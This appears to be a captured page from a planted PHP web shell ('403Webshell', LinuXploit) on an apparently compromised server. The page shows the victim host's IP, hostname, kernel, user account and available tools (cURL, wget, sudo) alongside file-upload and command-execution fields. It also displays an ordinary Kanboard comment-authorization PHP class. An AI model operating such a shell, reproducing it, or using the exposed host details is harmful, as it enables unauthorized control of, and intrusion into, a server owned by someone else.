403Webshell
Server IP : 185.252.147.100  /  Your IP : 216.73.217.33
Web Server : nginx/1.27.3
System : Linux mitrofanov.ru 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
User : mitr ( 1000)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/html/kanboard/app/Api/Authorization/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/html/kanboard/app/Api/Authorization/CommentAuthorization.php
<?php

namespace Kanboard\Api\Authorization;

use JsonRPC\Exception\AccessDeniedException;
use Kanboard\Core\Security\Role;

/**
 * Class CommentAuthorization
 *
 * @package Kanboard\Api\Authorization
 * @author  Frederic Guillot
 */
class CommentAuthorization extends ProjectAuthorization
{
    public function check($class, $method, $comment_id)
    {
        if ($this->userSession->isLogged()) {
            $this->checkProjectPermission($class, $method, $this->commentModel->getProjectId($comment_id));
            $this->checkCommentAccess($comment_id);
        }
    }

    /**
     * @param $comment_id ID of the comment to check
     * @return void
     * @throws AccessDeniedException
     */
    protected function checkCommentAccess($comment_id)
    {
        if (empty($comment_id)) {
            throw new AccessDeniedException('Comment Not Found');
        }

        $commentVisibility = $this->commentModel->getVisibility($comment_id);
        $userRole = $this->userSession->getRole();

        if ($userRole === Role::APP_MANAGER && $commentVisibility === Role::APP_ADMIN) {
            throw new AccessDeniedException('Comment Access Denied');
        }

        if ($userRole === Role::APP_USER && $commentVisibility !== Role::APP_USER) {
            throw new AccessDeniedException('Comment Access Denied');
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit